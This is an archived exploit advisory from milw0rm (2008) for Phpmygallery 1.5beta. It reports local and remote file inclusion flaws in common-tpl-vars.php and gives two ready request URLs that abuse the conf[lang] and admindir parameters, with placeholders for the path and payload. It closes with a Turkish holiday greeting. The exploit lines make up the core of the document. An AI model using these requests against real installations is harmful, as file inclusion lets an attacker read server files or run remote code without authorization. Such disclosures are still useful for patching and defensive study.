30 lines
No EOL
1,006 B
Text
30 lines
No EOL
1,006 B
Text
*****************************************************************************************
|
|
|
|
Phpmygallery-1.5beta (common-tpl-vars.php) Multiple Local File Inclusion Vulnerabilities
|
|
|
|
*****************************************************************************************
|
|
|
|
Script Name: Phpmygallery
|
|
|
|
Version: 1.5beta
|
|
|
|
Autor: CoBRa_21
|
|
|
|
My Site: www.ipbul.org
|
|
|
|
Download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.5beta.zip
|
|
|
|
*****************************************************************************************
|
|
|
|
Exploit:
|
|
|
|
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?conf[lang]= [LFÄ°] (Windows Only)
|
|
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?admindir=[RFI]
|
|
|
|
*****************************************************************************************
|
|
|
|
Not: Tüm İslam Aleminin Kurban Bayramı Mobarek Olsun
|
|
|
|
*****************************************************************************************
|
|
|
|
# milw0rm.com [2008-12-09] |